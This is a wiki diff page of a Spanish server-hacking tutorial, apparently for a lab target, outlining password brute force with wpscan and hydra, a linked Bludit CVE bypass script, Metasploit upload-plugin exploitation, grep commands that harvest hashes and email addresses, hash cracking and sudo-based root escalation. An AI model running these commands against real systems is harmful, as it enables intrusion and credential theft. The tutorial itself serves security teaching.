Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
tutorial:hacking-servidores [2025/05/10 03:15] truper |
tutorial:hacking-servidores [2025/05/12 05:00] (actual) truper |
||
---|---|---|---|
Línea 83: | Línea 83: | ||
* %%wpscan --url http://192.168.0.137/wordpress -U maria -P rockyou.txt%% | * %%wpscan --url http://192.168.0.137/wordpress -U maria -P rockyou.txt%% | ||
* Al **panel de login** como en cualquier otro **CMS** (menos eficiente y más dificil de escribir) | * Al **panel de login** como en cualquier otro **CMS** (menos eficiente y más dificil de escribir) | ||
- | * Con hydra | + | * Con **hydra** |
- | * con un script hecho a medida como el de [[https://github.com/0xDTC/Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240/blob/master/CVE-2019-17240|Bludit]] | + | * data="cadena del inspector de código de firefox del archivo login.php" |
+ | * hydra -l pepe -P rockyou.txt url http-post-form data | ||
+ | * Con un script hecho a medida como el de [[https://github.com/0xDTC/Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240/blob/master/CVE-2019-17240|Bludit]] | ||
* 2º Una vez descubierta la contraseña se explota una **vulnerabilidad** en un **plugin de subida de archivos** | * 2º Una vez descubierta la contraseña se explota una **vulnerabilidad** en un **plugin de subida de archivos** | ||
* Desde metasploit (fácil) | * Desde metasploit (fácil) | ||
Línea 92: | Línea 94: | ||
* show options | * show options | ||
* set, run | * set, run | ||
- | * una vez dentro se obtiene shell como usuario www-data y: | + | * una vez dentro se obtiene **shell** como usuario **www-data** y: |
* Se buscan **hashes y credenciales** por los archivos de la ruta del **CMS** __%%/var/www/html/loquesea%%__ | * Se buscan **hashes y credenciales** por los archivos de la ruta del **CMS** __%%/var/www/html/loquesea%%__ | ||
+ | * %%grep -irE '[a-z]+:\$' /var/www/cms/*%% | ||
+ | * %%grep -irE '[a-z]+@gmail' /var/www/cms/*%% | ||
+ | * Obtenido el **hash** se intenta **descifrar** en **[[https://crackstation.net|crackstation]]** | ||
+ | * Se intenta hacer **escalada a root** | ||
+ | * **sudo -l** (con el que estamos), **sudo -l -U www-data** | ||
+ | * (ALL : ALL) ALL | ||
+ | * (ALL) NOPASSWD: ALL -> El usuario puede ejecutar cualquier comando como root sin necesidad de contraseña. Escalada inmediata. | ||
* creando el archivo malicioso (payload) con metasploit que contiene una reverse shell (más difícil) | * creando el archivo malicioso (payload) con metasploit que contiene una reverse shell (más difícil) | ||